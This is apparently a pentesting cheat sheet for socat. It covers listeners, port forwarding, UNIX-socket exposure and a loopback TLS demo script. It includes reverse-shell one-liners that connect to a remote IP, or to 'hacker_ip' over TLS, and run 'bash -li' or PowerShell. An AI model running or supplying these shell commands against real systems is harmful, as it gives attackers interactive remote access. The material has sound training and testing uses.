socat

pivoting_tunneling_port_forwarding introtoshells

socat is a command-line tool similar to netcat. Like other such tools it can act as a client or as a server, but with socat you will usually specify an "address" for both ends of the connection.

On the target, you will most likely have to upload a static binary of socat as the command is rarely already installed.

The command takes two "addresses":

$ socat EXPR1 EXPR2

Note: add -d -d for debug information.

A few basic elements:

  • TCP-L:port/TCP-LISTEN:port: listen on that port
  • TCP:IP:port: connect to a host on a port
  • -/STDOUT: write to stdout
  • EXEC:xxx: connect to a command
  • FILE:xxx: connect to a file

Common Examples


For a server similar to nc -lnp port:

$ socat TCP-L:port FILE:`tty`,raw,echo=0 # interactive
$ socat TCP-L:port -                     # semi-interactive
$ socat TCP-LISTEN:port STDOUT           # semi-interactive

For a client similar to nc IP port [...]:

$ socat TCP:IP:port EXEC:"bash -li",pty,stderr,sigint,setsid,sane # interactive
$ socat TCP:IP:port EXEC:"bash -li"             # semi-interactive
PS> socat TCP:IP:port EXEC:powershell.exe,pipes # semi-interactive?

To use SSL/TLS, you need to generate a certificate (for example with openssl). Note that verify=0 disables certificate verification: the traffic is encrypted, but neither side authenticates the other.

$ cat key.pem cert.pem > shell.pem
$ socat OPENSSL-LISTEN:port,cert=shell.pem,verify=0 [...] # Server
$ socat OPENSSL:hacker_ip:port,verify=0 [...] # Client
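An added example (not from the original page) that runs a socat TLS echo listener on loopback and compares the verify=0 client above with a client that verifies the listener's certificate against a pinned cafile. It assumes socat and openssl are installed; the port 14443 and the file names are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the page): a loopback socat TLS echo relay showing the
# cheat sheet's verify=0 client next to a client that authenticates the listener.
# Assumes socat and openssl are installed; port and file names are constructed.
PORT=14443                          # constructed, arbitrary unprivileged port
WORKDIR=${WORKDIR:-$(mktemp -d)}    # holds the generated key/cert files

have_tools() { command -v socat >/dev/null 2>&1 && command -v openssl >/dev/null 2>&1; }

# Self-signed listener certificate; CN and SAN match the address the client dials
# so socat's default peer-name check passes. A second, unrelated certificate stands
# in for a wrong trust anchor.
gen_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=127.0.0.1" -addext "subjectAltName=IP:127.0.0.1" \
        -keyout "$WORKDIR/key.pem" -out "$WORKDIR/cert.pem" >/dev/null 2>&1
    cat "$WORKDIR/key.pem" "$WORKDIR/cert.pem" > "$WORKDIR/shell.pem"
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=127.0.0.1" -addext "subjectAltName=IP:127.0.0.1" \
        -keyout "$WORKDIR/other.key" -out "$WORKDIR/other.pem" >/dev/null 2>&1
}

# Listener bound to loopback only; EXEC:cat echoes each client's input back.
# On the server side verify=0 only means "do not demand a client certificate".
start_server() {
    socat "OPENSSL-LISTEN:$PORT,bind=127.0.0.1,reuseaddr,fork,cert=$WORKDIR/shell.pem,verify=0" EXEC:cat &
    SERVER_PID=$!
    sleep 1   # give the listener a moment to bind
}
stop_server() { kill "$SERVER_PID" 2>/dev/null || true; wait "$SERVER_PID" 2>/dev/null || true; }

# Weak client from the cheat sheet: any certificate is accepted, so the channel
# is encrypted but the listener is never authenticated.
tls_echo_unverified() { printf '%s\n' "$1" | socat - "OPENSSL:127.0.0.1:$PORT,verify=0"; }

# Hardened client: trust only the certificate in $2 and enforce verification.
tls_echo_verified() { printf '%s\n' "$1" | socat - "OPENSSL:127.0.0.1:$PORT,cafile=$2,verify=1"; }

main() {
    have_tools || { echo "socat/openssl not found, skipping demo"; return 0; }
    gen_cert; start_server
    echo "verify=0 client:      $(tls_echo_unverified ping)"
    echo "pinned cafile client: $(tls_echo_verified ping "$WORKDIR/cert.pem")"
    if tls_echo_verified ping "$WORKDIR/other.pem" 2>/dev/null; then
        echo "wrong cafile: ACCEPTED (unexpected)"
    else
        echo "wrong cafile: rejected, as it should be"
    fi
    stop_server
}
main
```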

To expose a UNIX socket at localhost:1234 (TCP-LISTEN accepts connections on all interfaces unless you add bind=127.0.0.1):

$ socat TCP-LISTEN:1234,reuseaddr,fork UNIX-CONNECT:/path/to/xxx.sock

Listen on port 1234 and forward the traffic to IP:port:

$ socat TCP4-LISTEN:1234,fork TCP4:IP:port